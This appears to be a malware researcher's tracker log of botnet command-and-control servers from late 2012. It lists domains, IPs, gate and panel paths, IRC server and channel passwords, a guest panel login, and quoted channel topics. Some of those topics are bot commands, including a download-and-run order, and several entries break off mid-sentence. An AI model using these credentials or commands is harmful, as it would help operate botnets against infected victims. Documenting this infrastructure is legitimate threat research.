Resolved runescape-livestream.tv to 198.20.67.66
Server: runescape-livestream.tv
Gate file: /andro/image.php
Plugins:
Rootkit: http://runescape-livestream.tv/andro/r.pack
Formgrabber: http://runescape-livestream.tv/andro/f.pack
Gate file: /andro/fg.php
Hosting infos: http://whois.domaintools.com/198.20.67.66
bootcamp4wealth.com (Ice 9 banking malware hosted by wiredtree.com)
Resolved bootcamp4wealth.com to 173.199.181.60
Server: bootcamp4wealth.com
Gate file: bootcamp4wealth.com/wp-directory/images/config/adm/gate.php
Config file: bootcamp4wealth.com/wp-directory/images/config/config/index.php
Login page: bootcamp4wealth.com/wp-directory/images/config/adm/index.php?m=login
Anyone infected with this is safe for now, as the owner hasn't figured out that the bot and the config dropper need the same key for it to work.
Hosting infos: http://whois.domaintools.com/173.199.181.60
qwer.be (YZF ddos botnet hosted by metrabyte.co.th)
Resolved qwer.be to 119.59.99.200
Server: qwer.be
Gate file: /1234567/cmd.php
Information for building HTTP requests is stored in /1234567/sys/ as text files renamed to PNGs.
http://qwer.be/1234567/sys/UserAgent.png
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
x.n-0-r-1.org (ngr irc botnet hosted by Russian Federation Saint Petersburg Selectel Ltd.)
This botnet has lots of domains, none of which are resolving at the moment:
x.n-0-r-1.org
x.n0r1.org
x.n2rx.asia
x.n1rx.asia
x.n0r2.asia
x.n0r1.asia
x.dload.ws
x.xd11.in
You can still connect to the server using its IP address though.
Server: 31.186.102.189
Port: 80
Server password: 666666
Channel: ##CBC-x01##
* Topic for ##CBC-x01## is: !m on !mod usbi on !NAZEL
f0010.info (ngr irc botnet hosted by perfectip.net)
Resolved f0010.info to 64.56.64.29, 64.56.64.26
Server: f0010.info
Port: 1887
Server password: leonis
Channel: #pool
Channel password: leonis
* Topic for #pool is: ~pu hxxp://www.sendspace.com/pro/dl/ishh04 1f88bb85c51290b759d16dda9fff692d ~s -o ~s
* Topic for #pool set by google at Mon Dec 17 12:16:33 2012
Bots also join the channel for their country, e.g. #US, and operating system,
bid.consulting-info.eu (Click fraud botnet hosted by quadranet.com)
Resolved bid.consulting-info.eu to s1.fclick.org (CNAME)
Resolved s1.fclick.org to 96.44.149.187
Server: bid.consulting-info.eu
Gate file: /feed/xml.php?uid=219
More click fraud courtesy of French hacker h4r3. This time it looks a bit more sophisticated though. I'm assuming this is an affiliate program, as while it's using h4r3's domain it points to another site. If you search for
lnx.ekolik.net (LnX irc botnet hosted by sadecehosting.net)
Resolved lnx.ekolik.net to 188.132.192.238
Resolved p2c.ekolik.net to 188.132.192.238 (same IP, different domain name)
Server: lnx.ekolik.net
Port: 6667
Server password: lnx
Channel: #!bot!
Channel password: lnx
* Topic for #!bot! is: .winrar | .p2p | .lan
* Topic for #!bot! set by Z-Lined at Sun Dec 16 11:50:45 2012
Channel: #Debug#
* Topic for
74.208.111.48 (HEX reptile mod hosted by 1and1.com)
ALiSs has found a new net.
Server: 74.208.111.48
Port: 1866
Channel: #!h!
* Topic for #!h! is: .load /99/106/112/81/55/59/40/105/121/99/108/102/45/111/98/115/102/103/110/97/108/101/120/8/64/119/114/53/122/126/122/126/117/113/100/83/46/112/124/64/40/46/102/126/105/
* Topic for #!h! set by wweras at Fri Dec 14 20:55:55 2012
Hosting infos: http://whois.domaintools.com/74.208.111.48
freetraffcounter.com (Click fraud botnet hosted by worldstream.nl)
Resolved freetraffcounter.com to 109.236.87.219
This is from the same guy as all the installs stuff I just posted, but it was downloaded separately using the Smoke Loader, so I gave it a post of its own. The bot first gets the ad link information from the freetraffcounter.com site. The link information is stored in JavaScript
adzu324nbasmdaoias.su (Smokeloader http botnet hosted by istanbuldc.com)
Resolved adzu324nbasmdaoias.su to 185.4.227.98
Server: adzu324nbasmdaoias.su
Gate file: /wp/index.php
Guest login: adzu324nbasmdaoias.su/wp/guest.php guest:guest
Hosting infos: http://whois.domaintools.com/185.4.227.98